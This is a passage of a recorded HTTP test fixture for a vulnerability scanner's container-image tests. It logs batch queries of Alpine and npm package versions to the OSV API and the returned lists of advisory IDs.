"Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_insecure_alpine_image_without_detectors url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2344 host: api.osv.dev body: | { 
"queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_node_modules_using_npm_with_no_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2685 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": 
"2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", 
"modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2685" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2701 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "npm", "name": "cryo" }, "version": "0.0.6" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, 
"version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "npm", "name": "minimist" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "mkdirp" }, "version": "0.5.0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_node_modules_using_npm_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2922 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": 
"ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, { "vulns": [ { "id": "GHSA-38f5-ghc2-fcmv", "modified": "2023-11-08T04:00:20.055238Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "GHSA-vh95-rmgr-6w4m", "modified": "2026-03-13T22:11:31.390433Z" }, { "id": "GHSA-xvch-5gv4-984h", "modified": "2026-03-13T22:11:59.523514Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", 
"modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2922" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2344 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": 
"1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_node_modules_using_pnpm_with_no_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2685 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": 
"ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2685" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2344 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", 
"name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_node_modules_using_pnpm_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2685 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": 
"ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": 
"ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2685" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2344 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": 
"musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_node_modules_using_yarn_with_no_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2685 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": 
"2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2685" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2344 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": 
